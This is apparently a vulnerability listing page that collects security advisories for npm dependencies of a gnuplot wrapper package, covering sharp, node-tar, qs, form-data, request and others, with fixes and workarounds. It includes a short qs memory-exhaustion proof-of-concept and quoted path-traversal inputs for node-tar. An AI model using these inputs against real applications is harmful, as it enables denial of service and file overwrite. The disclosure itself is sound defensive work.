All the vulnerabilities related to the version 0.4.1 of the package
Uncontrolled Resource Consumption in trim-newlines
@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
sharp vulnerability in libwebp dependency CVE-2023-4863
sharp uses libwebp to decode WebP images and versions prior to the latest 0.32.6 are vulnerable to the high severity https://github.com/advisories/GHSA-j7hp-h8jx-5ppr.
Almost anyone processing untrusted input with versions of sharp prior to 0.32.6.
Most people rely on the prebuilt binaries provided by sharp.
Please upgrade sharp to the latest 0.32.6, which provides libwebp 1.3.2.
Please ensure you are using the latest libwebp 1.3.2.
Add the following to your code to prevent sharp from decoding WebP images.
sharp.block({ operation: ["VipsForeignLoadWebp"] });
sharp vulnerable to Command Injection in post-installation over build environment
There's a possible vulnerability in logic that is run only at npm install time when installing versions of sharp prior to the latest v0.30.5.
This is not part of any runtime code, does not affect Windows users at all, and is unlikely to affect anyone that already cares about the security of their build environment. However, out of an abundance of caution, I've created this advisory.
If an attacker has the ability to set the value of the PKG_CONFIG_PATH environment variable in a build environment then they might be able to use this to inject an arbitrary command at npm install time.
I've used the Common Vulnerability Scoring System (CVSS) calculator to determine the maximum possible impact, which suggests a "medium" score of 5.9, but for most people the real impact will be dealing with the noise from automated security tooling that this advisory will bring.
This problem was fixed in commit a6aeef6 and published as part of sharp v0.30.5.
Thank you very much to @dwisiswant0 for the responsible disclosure.
Remember: if an attacker has control over environment variables in your build environment then you have a bigger problem to deal with than this issue.
Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the preservePaths flag is not set to true. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example /home/user/.bashrc would turn into home/user/.bashrc.
This logic was insufficient when file paths contained repeated path roots such as ////home/user/.bashrc. node-tar would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. ///home/user/.bashrc) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite.
3.2.2 || 4.4.14 || 5.0.6 || 6.1.1
NOTE: an adjacent issue CVE-2021-32803 affects this release level. Please ensure you update to the latest patch levels that address CVE-2021-32803 as well if this adjacent issue affects your node-tar use case.
Users may work around this vulnerability without upgrading by creating a custom onentry method which sanitizes the entry.path or a filter method which removes entries with absolute paths.
const path = require('path')
const tar = require('tar')
tar.x({
file: 'archive.tgz',
// either add this function...
onentry: (entry) => {
if (path.isAbsolute(entry.path)) {
entry.path = sanitizeAbsolutePathSomehow(entry.path)
entry.absolute = path.resolve(entry.path)
}
},
// or this one
filter: (file, entry) => {
if (path.isAbsolute(entry.path)) {
return false
} else {
return true
}
}
})
Users are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain .. path portions, and resolving the sanitized paths against the extraction target directory.
This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as C:some\path. If the drive letter does not match the extraction target, for example D:\extraction\dir, then the result of path.resolve(extractionDirectory, entryPath) would resolve against the current working directory on the C: drive, rather than the extraction target directory.
Additionally, a .. portion of the path could occur immediately after the drive letter, such as C:../foo, and was not properly sanitized by the logic that checked for .. within the normalized and split portions of the path.
This only affects users of node-tar on Windows systems.
4.4.18 || 5.0.10 || 6.1.9
There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does.
Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.
The fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not "absolute".
Additionally, a path starting with a drive letter and then two dots, like c:../, would bypass the check for .. path portions. This is checked properly in the patched versions.
Finally, a defense in depth check is added, such that if the entry.absolute is outside of the extraction taret, and we are not in preservePaths:true mode, a warning is raised on that entry, and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development.
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar package I came across the folder creation process, Basicly if you provide node-tar with a path like this ./a/b/c/foo.txt it would create every folder and sub-folder here a, b and c until it reaches the last folder to create foo.txt, In-this case I noticed that there's no validation at all on the amount of folders being created, that said we're actually able to CPU and memory consume the system running node-tar and even crash the nodejs client within few seconds of running it using a path with too many sub-folders inside
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it, you should get the same behavior as the video
Here's a video show-casing the exploit:
Denial of service by crashing the nodejs client when attempting to parse a tar archive, make it run out of heap memory and consuming server CPU and memory resources
This report was originally reported to GitHub bug bounty program, they asked me to report it to you a month ago
Regular Expression Denial of Service (ReDOS)
In the npm package color-string, there is a ReDos (Regular Expression Denial of Service) vulnerability regarding an exponential time complexity for
linearly increasing input lengths for hwb() color strings.
Strings reaching more than 5000 characters would see several milliseconds of processing time; strings reaching more than 50,000 characters began seeing 1500ms (1.5s) of processing time.
The cause was due to a the regular expression that parses hwb() strings - specifically, the hue value - where the integer portion of the hue value used a 0-or-more quantifier shortly thereafter followed by a 1-or-more quantifier.
This caused excessive backtracking and a cartesian scan, resulting in exponential time complexity given a linear increase in input length.
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
obj = utils.combine([], leaf); // No arrayLimit check
}
Working code (lib/parse.js:175):
else if (index <= options.arrayLimit) { // Limit checked here
obj = [];
obj[index] = leaf;
}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
Test 1 - Basic bypass:
npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length); // Output: 6 (should be max 5)
Test 2 - DoS demonstration:
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
Configuration:
arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)a[]=value (not indexed a[0]=value)Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)qs.parse(query, { arrayLimit: 100 })Real-world impact:
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
? []
: utils.combine([], leaf); // No arrayLimit check
}
Fixed code:
if (root === '[]' && options.parseArrays) {
// Use currentArrayLength already calculated at line 147-151
if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
}
// If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
if (currentArrayLength >= options.arrayLimit) {
obj = options.plainObjects ? { __proto__: null } : {};
obj[currentArrayLength] = leaf;
} else {
obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
? []
: utils.combine([], leaf);
}
}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).
form-data uses unsafe random function in form-data for choosing boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must:
form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.